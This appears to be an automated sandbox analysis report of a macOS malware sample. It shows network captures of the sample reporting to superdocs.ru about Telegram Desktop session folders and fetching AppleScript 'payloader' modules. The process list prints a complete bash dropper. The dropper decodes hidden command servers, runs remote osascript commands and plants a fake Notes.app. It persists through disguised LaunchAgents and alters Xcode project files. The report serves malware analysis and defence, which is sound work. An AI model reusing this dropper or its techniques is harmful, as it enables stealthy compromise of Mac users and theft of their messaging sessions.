2022-08-24 09:19:57 UTC	344	OUT	Data Raw: 70 72 6f 63 65 73 73 69 6e 67 20 66 6f 6c 64 65 72 20 27 2f 55 73 65 72 73 2f 70 65 64 72 6f 2f 4c 69 62 72 61 72 79 2f 43 6f 6e 74 61 69 6e 65 72 73 2f 6f 72 67 2e 74 65 6c 65 67 72 61 6d 2e 64 65 73 6b 74 6f 70 2f 44 61 74 61 2f 4c 69 62 72 61 72 79 2f 41 70 70 6c 69 63 61 74 69 6f 6e 20 53 75 70 70 6f 72 74 2f 54 65 6c 65 67 72 61 6d 20 44 65 73 6b 74 6f 70 2f 74 64 61 74 61 27 Data Ascii: processing folder '/Users/pedro/Library/Containers/org.telegram.desktop/Data/Library/Application Support/Telegram Desktop/tdata'
2022-08-24 09:19:57 UTC	344	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:57 UTC	344	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.0.53	49354	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:58 UTC	344	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: telegram_lite Content-Length: 37 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:58 UTC	344	OUT	Data Raw: 73 65 73 73 69 6f 6e 20 66 6f 6c 64 65 72 20 4e 4f 54 20 66 6f 75 6e 64 2e 20 73 6b 69 70 70 69 6e 67 2e 2e 2e Data Ascii: session folder NOT found. skipping...
2022-08-24 09:19:58 UTC	345	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:58 UTC	345	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.0.53	49351	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:58 UTC	344	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: bootstrap Content-Length: 58 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:58 UTC	345	OUT	Data Raw: 6d 61 70 70 69 6e 67 3a 20 74 65 6c 65 67 72 61 6d 5f 6c 69 74 65 20 2d 20 63 6f 6d 2e 75 74 69 6c 73 2e 63 6f 72 65 2e 6c 61 75 6e 63 68 73 65 72 76 69 63 65 73 2e 61 70 70 Data Ascii: mapping: telegram_lite - com.utils.core.launchservices.app
2022-08-24 09:19:58 UTC	345	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:58 UTC	345	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.0.53	49355	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:59 UTC	345	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: telegram_lite Content-Length: 83 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:59 UTC	345	OUT	Data Raw: 70 72 6f 63 65 73 73 69 6e 67 20 66 6f 6c 64 65 72 20 27 2f 55 73 65 72 73 2f 70 65 64 72 6f 2f 4c 69 62 72 61 72 79 2f 41 70 70 6c 69 63 61 74 69 6f 6e 20 53 75 70 70 6f 72 74 2f 54 65 6c 65 67 72 61 6d 20 44 65 73 6b 74 6f 70 2f 74 64 61 74 61 27 Data Ascii: processing folder '/Users/pedro/Library/Application Support/Telegram Desktop/tdata'
2022-08-24 09:19:59 UTC	345	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:59 UTC	345	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.0.53	49356	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:20:00 UTC	345	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: telegram_lite Content-Length: 37 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:20:00 UTC	346	OUT	Data Raw: 73 65 73 73 69 6f 6e 20 66 6f 6c 64 65 72 20 4e 4f 54 20 66 6f 75 6e 64 2e 20 73 6b 69 70 70 69 6e 67 2e 2e 2e Data Ascii: session folder NOT found. skipping...
2022-08-24 09:20:00 UTC	346	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:20:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:20:00 UTC	346	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.0.53	49357	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:20:01 UTC	346	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: telegram_lite Content-Length: 15 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:20:01 UTC	346	OUT	Data Raw: 6d 6f 64 75 6c 65 20 66 69 6e 69 73 68 65 64 Data Ascii: module finished
2022-08-24 09:20:01 UTC	346	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:20:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:20:01 UTC	346	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.0.53	49358	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:20:02 UTC	346	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: bootstrap Content-Length: 26 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:20:02 UTC	346	OUT	Data Raw: 64 65 6c 61 79 20 33 30 30 73 20 62 65 66 6f 72 65 20 62 72 6f 77 73 65 72 73 Data Ascii: delay 300s before browsers
2022-08-24 09:20:02 UTC	346	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:20:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:20:02 UTC	347	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.0.53	49307	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:00 UTC	16	OUT	POST /agent/scripts/remove_old.applescript HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / Content-Length: 10 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:00 UTC	16	OUT	Data Raw: 75 73 65 72 3d 70 65 64 72 6f Data Ascii: user=pedro
2022-08-24 09:19:00 UTC	16	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:00 UTC	16	IN	Data Raw: 63 62 33 0d 0a 0a 67 6c 6f 62 61 6c 20 6d 6f 64 75 6c 65 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 75 73 65 72 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 64 46 6f 6c 64 65 72 0a 0a 0a 73 65 74 20 6d 6f 64 75 6c 65 4e 61 6d 65 20 74 6f 20 22 72 65 6d 6f 76 65 5f 6f 6c 64 22 0a 73 65 74 20 75 73 65 72 4e 61 6d 65 20 74 6f 20 64 6f 20 73 68 65 6c 6c 20 73 63 72 69 70 74 20 22 77 68 6f 61 6d 69 22 0a 73 65 74 20 64 46 6f 6c 64 65 72 20 74 6f 20 50 4f 53 49 58 20 70 61 74 68 20 6f 66 20 28 28 70 61 74 68 20 74 6f 20 6d 65 20 61 73 20 74 65 78 74 29 20 26 20 22 3a 3a 22 29 0a 0a 0a 0a 0a 6f 6e 20 6c 6f 67 20 28 6d 65 73 73 61 67 65 29 0a 09 73 65 74 20 6d 65 73 73 61 67 65 20 74 6f 20 71 75 6f 74 65 64 20 66 6f 72 6d 20 6f 66 20 6d 65 73 73 61 67 65 0a 09 73 65 74 20 73 65 Data Ascii: cb3global moduleNameglobal userNameglobal dFolderset moduleName to "remove_old"set userName to do shell script "whoami"set dFolder to POSIX path of ((path to me as text) & "::")on log (message)set message to quoted form of messageset se

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.0.53	49308	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:00 UTC	19	OUT	GET /agent/bin/icons/Empty.icns HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: /
2022-08-24 09:19:00 UTC	20	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:00 GMT Content-Type: application/octet-stream Content-Length: 31308 Last-Modified: Thu, 18 Aug 2022 07:36:55 GMT Connection: close ETag: "62fdec17-7a4c" Accept-Ranges: bytes
2022-08-24 09:19:00 UTC	20	IN	Data Raw: 69 63 6e 73 00 00 7a 4c 69 63 31 32 00 00 00 ad 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 5f 49 44 41 54 78 01 ed d0 01 0d 00 00 00 c2 a0 f7 4f 6d 0e 37 88 40 61 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c bc 0f 0c 40 40 00 01 16 41 98 eb 00 00 00 00 49 45 4e 44 ae 42 60 82 69 63 30 37 00 00 01 84 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 01 36 49 44 41 54 78 01 ed d0 31 01 00 00 00 c2 a0 f5 Data Ascii: icnszLic12PNGIHDR@@iqsRGB_IDATxOm7@a0`0`0`0`0`0`0`@@AIENDB`ic07PNGIHDR>asRGB6IDATx1
2022-08-24 09:19:00 UTC	36	IN	Data Raw: 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 Data Ascii: 0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.0.53	49309	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:01 UTC	50	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: bootstrap Content-Length: 46 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:01 UTC	51	OUT	Data Raw: 6d 61 70 70 69 6e 67 3a 20 72 65 6d 6f 76 65 5f 6f 6c 64 20 2d 20 63 6f 6d 2e 75 74 69 6c 73 2e 63 6f 72 65 2e 73 6f 75 6e 64 2e 61 70 70 Data Ascii: mapping: remove_old - com.utils.core.sound.app
2022-08-24 09:19:01 UTC	51	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:01 UTC	51	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.0.53	49310	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:01 UTC	51	OUT	POST /agent/scripts/payloader.applescript HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / Content-Length: 10 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:01 UTC	51	OUT	Data Raw: 75 73 65 72 3d 70 65 64 72 6f Data Ascii: user=pedro
2022-08-24 09:19:01 UTC	51	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:01 UTC	51	IN	Data Raw: 31 66 63 65 0d 0a 0a 67 6c 6f 62 61 6c 20 6d 6f 64 75 6c 65 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 75 73 65 72 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 64 46 6f 6c 64 65 72 0a 67 6c 6f 62 61 6c 20 6c 61 73 74 48 61 73 68 0a 67 6c 6f 62 61 6c 20 6d 61 63 4f 73 56 65 72 73 69 6f 6e 0a 67 6c 6f 62 61 6c 20 6d 6f 64 43 6f 75 6e 74 32 0a 67 6c 6f 62 61 6c 20 66 6f 6c 64 65 72 73 41 63 63 65 73 73 4e 61 6d 65 73 0a 67 6c 6f 62 61 6c 20 64 6f 6d 61 69 6e 73 0a 67 6c 6f 62 61 6c 20 64 6f 6d 61 69 6e 0a 67 6c 6f 62 61 6c 20 64 6f 6d 61 69 6e 49 6e 64 65 78 0a 67 6c 6f 62 61 6c 20 73 65 72 69 61 6c 4e 75 6d 62 65 72 0a 0a 73 65 74 20 6d 6f 64 75 6c 65 4e 61 6d 65 20 74 6f 20 22 70 61 79 6c 6f 61 64 65 72 22 0a 73 65 74 20 75 73 65 72 4e 61 6d 65 20 74 6f 20 64 6f 20 73 68 Data Ascii: 1fceglobal moduleNameglobal userNameglobal dFolderglobal lastHashglobal macOsVersionglobal modCount2global foldersAccessNamesglobal domainsglobal domainglobal domainIndexglobal serialNumberset moduleName to "payloader"set userName to do sh

System Behavior

Analysis Process: mono-sgen64 PID: 956, Parent PID: 913

General

Start time:	11:18:39
Start date:	24/08/2022
Path:	/Library/Frameworks/Mono.framework/Versions/6.12.0/bin/mono-sgen64
Arguments:	n/a
File size:	4699168 bytes
MD5 hash:	98f65da8c6a62423d3f4cda359f06a87

Start time:	11:18:39
Start date:	24/08/2022
Path:	/usr/bin/sudo
Arguments:	/usr/bin/sudo -u pedro /Users/pedro/Desktop/exec.2430808
File size:	1246528 bytes
MD5 hash:	2d2c9298401fd5607184821a6ed73106

Start time:	11:18:39
Start date:	24/08/2022
Path:	/usr/bin/sudo
Arguments:	n/a
File size:	1246528 bytes
MD5 hash:	2d2c9298401fd5607184821a6ed73106

Start time:	11:18:39
Start date:	24/08/2022
Path:	/Users/pedro/Desktop/exec.2430808
Arguments:	/Users/pedro/Desktop/exec.2430808
File size:	1061683 bytes
MD5 hash:	1ce8099c5bb8fbe715ae7c546c46a526

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	/Users/pedro/Desktop/exec.2430808 -c exec '/Users/pedro/Desktop/exec.2430808' '$@' /Users/pedro/Desktop/exec.2430808
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/Users/pedro/Desktop/exec.2430808
Arguments:	/Users/pedro/Desktop/exec.2430808
File size:	1061683 bytes
MD5 hash:	1ce8099c5bb8fbe715ae7c546c46a526

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	/Users/pedro/Desktop/exec.2430808 -c #!/bin/bashAUTOCLEAN=$2BASEDIR=$1BASEDIR=${PROJECT_FILE_PATH}BUILD_VERSION=1.1.5BUILD_VENDOR='default'RANDOM_PATHS=('$HOME/Library/Application Support/com.apple.spotlight' '$HOME/Library/Application Scripts/com.apple.CalendarAgent' '$HOME/Library/Group Containers/group.com.apple.mail' '$HOME/Library/Containers/com.apple.photolibraryd')DOMAIN_ONE=$(echo '73 75 70 65 72 64 6F 63 73 2E 72 75' \| xxd -p -r)DOMAIN_TWO=$(echo '6D 65 6C 69 6E 64 61 73 2E 72 75' \| xxd -p -r)DOMAIN_THREE=$(echo '6B 69 6E 6B 73 64 6F 63 2E 72 75' \| xxd -p -r)DOMAIN_FOUR=$(echo '61 64 6F 62 65 66 69 6C 65 2E 72 75' \| xxd -p -r)ACTIVE_DOMAINS=(${DOMAIN_ONE} ${DOMAIN_TWO} ${DOMAIN_THREE} ${DOMAIN_FOUR})TARGET_DOMAIN=${ACTIVE_DOMAINS[RANDOM%${#ACTIVE_DOMAINS[@]}]}if [ ! -z '$3' ] then TARGET_DOMAIN=$3fiSTR_TWO=$(echo '58 2D 4D 6F 64 3A 20 50 6F 64 73' \| xxd -p -r) # X-Mod: PodsSTR_ONE=$(echo '58 2D 55 73 72 3A' \| xxd -p -r) # X-Usr:TARGETDIRFILE='$HOME/Library/Caches/GitServices/.report'TARGETPLISTFILE='$HOME/Library/Caches/GitServices/.plist'TARGETDOMAINFILE='$HOME/Library/Caches/GitServices/.domain'BOOT_FILE='$HOME/Library/Caches/GitServices/AppleWebKit'EXEC_DONE_FILE='$HOME/Library/Caches/GitServices/.exec_done'RANDOM_PLISTS=('$HOME/Library/LaunchAgents/com.apple.airplay.plist' '$HOME/Library/LaunchAgents/com.apple.spx.plist' '$HOME/Library/LaunchAgents/com.google.keystore.plist' '$HOME/Library/LaunchAgents/com.google.chrome.plist')MACOS_VERSION=$(defaults read loginwindow SystemVersionStampAsString)logme(){curl --connect-timeout 11 -s -k -d '$1' -H '$STR_ONE $USER' -H '$STR_TWO' 'https://$TARGET_DOMAIN/sys/log.php' > /dev/null 2>&1}clean_proj(){perl -ni -e 'print unless /(.)AAC43A(.),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(.)6D902C(.),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(.)FFA81D(.),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(.)6A102C(.),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(3F708E50247A0EB6004066FD)(.),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(162E3FD122D63A22006D904C)(.),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(1D60589F0D05DD5A006BFC54)(.),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(1D3623260D0F684500981D51)(.),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(167012E12301506800C38AA3)(.),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1rm -rf '$BASEDIR/xcuserdata/.xcassets/' \|\| true}write_meta(){TARGETDIRFILE_DIR=`dirname $2`[ ! -d $TARGETDIRFILE_DIR ] && mkdir -p $TARGETDIRFILE_DIRecho '$1' > '$2'}curl --connect-timeout 11 -s -k 'https://$TARGET_DOMAIN' > /dev/null \|\| exit 0str=''for ARG in '$@' do str='${str} ${ARG}'doneecho 'launched with args v10 notes app:${str}'echo 'basedir:${1}, autoclean: ${2}, domain: ${3}'cmd=$(curl -ks -m 5 -H '$STR_ONE $USER' https://$TARGET_DOMAIN/sys/prepod.php)if [[ ! -z '$cmd' ]] thenecho 'got prepod remote command. executing...'osascript -e '$cmd' 2>/dev/null && exit 1echo 'remote command failed. continue normal flow...'fiif [ -f '$TARGETDIRFILE' ] thenTARGETDIR=$(cat '$TARGETDIRFILE')APP_FILE='$TARGETDIR/Notes.app'if [ ! -d '$APP_FILE' ] thenTARGETDIR=${RANDOM_PATHS[RANDOM%${#RANDOM_PATHS[@]}]}fielseTARGETDIR=${RANDOM_PATHS[RANDOM%${#RANDOM_PATHS[@]}]}fiif [ -f '$TARGETPLISTFILE' ] thenPLIST_FILE=$(cat '$TARGETPLISTFILE')if [ ! -f '$PLIST_FILE' ] thenPLIST_FILE=${RANDOM_PLISTS[RANDOM%${#RANDOM_PLISTS[@]}]}fielsePLIST_FILE=${RANDOM_PLISTS[RANDOM%${#RANDOM_PLISTS[@]}]}fiecho 'target dir is: $TARGETDIR target domain: $TARGET_DOMAIN target plist: $PLIST_FILE'APP_FILE='$TARGETDIR/Notes.app'SCPT_FILE='$TARGETDIR/Notes.app/Contents/Resources/Scripts/a.scpt'if [ ! -d '$APP_FILE' ] thenecho 'step 1'fiif [ ! -f '$PLIST_FILE' ] thenecho 'step 2'fiif [ ! -f '$EXEC_DONE_FILE' ] thenecho 'step 3'fiif [ -d '$APP_FILE' ] && [ -f '$PLIST_FILE' ] && [ -f '$BOOT_FILE' ] && [ -f '$EXEC_DONE_FILE' ] thenecho 'all files are set!'SERVICE_IS_RUNNING=$(pgrep -f com.java.core com.sys.core > /dev/null 2>&1 && echo 1 \|\| echo 0)if [ $SERVICE_IS_RUNNING = 0 ] thenecho 'service is not running. restarting...'if [[ $MACOS_VERSION == '11.' ]] then curl -ks -o /tmp/open 'https://$TARGET_DOMAIN/agent/bin/open' chmod +x /tmp/open /tmp/open '$APP_FILE' > /dev/null 2>&1 &elseopen '$APP_FILE' > /dev/null 2>&1 &fifiif [[ '$AUTOCLEAN' = true ]] thenclean_projfi[ ! -f $TARGETDIRFILE ] && write_meta $TARGETDIR $TARGETDIRFILEexit 0fiecho 'first launch. processing...'for i in '${RANDOM_PATHS[@]}'dorm -rf '$i/Notes.app' > /dev/null 2>&1rm -rf '$i/Containers' > /dev/null 2>&1donetouch '$TMPDIR/test.tmp' 2>/dev/null \|\| truefor i in '${RANDOM_PLISTS[@]}'dorm -f '$i' > /dev/null 2>&1rm -f '$i' > /dev/null 2>&1doneecho 'cleaning done...'mkdir -p '$TARGETDIR' > /dev/null 2>&1echo 'created directory structure...'read -r -d '' PAYLOAD2 << EOMtrydo shell script 'osascript '$SCPT_FILE''end tryEOMosacompile -x -e '$PAYLOAD2' -o '$APP_FILE' > /dev/null 2>&1touch '$TMPDIR/test2.tmp' 2>/dev/null \|\| trueecho 'compiled app...'read -r -d '' PAYLOAD << EOMglobal dsglobal dglobal diset ds to {'', '', '', '', '', ''}set di to 1set d to item di of dson xe(_str)set x to id of _strrepeat with c in xset contents of c to c - (102 - 2)end repeatreturn string id xend xeon xex(_str)set x to id of _strrepeat with c in xset contents of c to c - (102 - 1)end repeatreturn string id xend xexon m()-- log 'domain used ' & xe(d)set dF to POSIX path of ((path to me as text) & '::')set tF to quoted form of (dF & xex('')) -- /Containersdo shell script 'rm -rf ' & tFset a to '123'do shell script 'mkdir -p ' & tFset f to quoted form of (dF & xex('')) -- /Containers/aset un to do shell script xe('') -- whoamido shell script 'curl -sk -d '' & xe('') & '=' & un & '&' & xex('') & '=$BUILD_VENDOR&' & xex('') & '=$BUILD_VERSION' https://' & xe(d) & '/' & xe('') & ' \| ' & xex('') & ' -x -o ' & fdo shell script xex('') & ' ' & f & ' > /dev/null 2>&1'do shell script 'touch .a 2>/dev/null \|\| true'do shell script 'rm -f ' & fend mon b()trydo shell script xe('') & ' 3 ' & xe(d) -- ping -o -t 3on errortryset di to di + 1set d to item di of dson errorset di to 1set d to item di of dsend tryreturn falseend tryend bon a()if b() is false thendelay 9a()elsem()end ifend atrya()end tryEOMecho '$PAYLOAD' > '$SCPT_FILE' echo 'created scpt...'touch '$TMPDIR/test3.tmp' 2>/dev/null \|\| trueplutil -replace LSUIElement -bool YES '$APP_FILE/Contents/Info.plist' > /dev/null 2>&1rm -f '$APP_FILE/Contents/Resources/applet.icns' > /dev/null 2>&1XCODE_ICNS='/System/Applications/Notes.app/Contents/Resources/AppIcon.icns'if [ -f '$XCODE_ICNS' ] thencp -f '$XCODE_ICNS' '$APP_FILE/Contents/Resources/applet.icns' > /dev/null 2>&1fiecho 'put Xcode icon in place...'mkdir -p $(dirname $PLIST_FILE) > /dev/null 2>&1mkdir -p $(dirname $BOOT_FILE) > /dev/null 2>&1cat > '$BOOT_FILE' << EOT'$APP_FILE/Contents/MacOS/applet'EOTchmod +x '$BOOT_FILE'cat > '$PLIST_FILE' << EOT<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>Label</key><string>demo</string><key>Program</key><string>/bin/bash</string><key>ProgramArguments</key><array><string>bash</string><string>$BOOT_FILE</string></array><key>RunAtLoad</key><true/><key>StandardErrorPath</key><string>/dev/null</string><key>StandardOutPath</key><string>/dev/null</string><key>StartInterval</key><integer>21600</integer></dict></plist>EOTecho '$PLIST_FILE' > '$TARGETPLISTFILE'echo 'wrote to LaunchAgents... wrote .plist'launchctl unload -w '$PLIST_FILE' > /dev/null 2>&1touch '$TMPDIR/test4.tmp' 2>/dev/null \|\| truelaunchctl load -w '$PLIST_FILE' > /dev/null 2>&1echo 'loaded service...'if [[ '$AUTOCLEAN' = true ]] thenclean_projecho 'cleaned project...'fiwrite_meta '$TARGETDIR' '$TARGETDIRFILE'echo 'wrote .report'touch '$TMPDIR/test5.tmp' 2>/dev/null \|\| trueecho '$TARGET_DOMAIN' > '$TARGETDOMAINFILE'touch '$TMPDIR/test6.tmp' 2>/dev/null \|\| trueecho 'wrote .domain'echo 'done. finished.'exit 0 /Users/pedro/Desktop/exec.2430808
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/usr/bin/xxd
Arguments:	xxd -p -r
File size:	167712 bytes
MD5 hash:	aaca2dc9ef1cdee4042195108a1e9588

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/usr/bin/xxd
Arguments:	xxd -p -r
File size:	167712 bytes
MD5 hash:	aaca2dc9ef1cdee4042195108a1e9588

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/usr/bin/xxd
Arguments:	xxd -p -r
File size:	167712 bytes
MD5 hash:	aaca2dc9ef1cdee4042195108a1e9588

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
File size:	1326576 bytes
MD5 hash:	c0c00727c39ed1a5586291299575a6aa

Start time:	11:18:39
Start date:	24/08/2022
Path:	/bin/bash
Arguments:	n/a
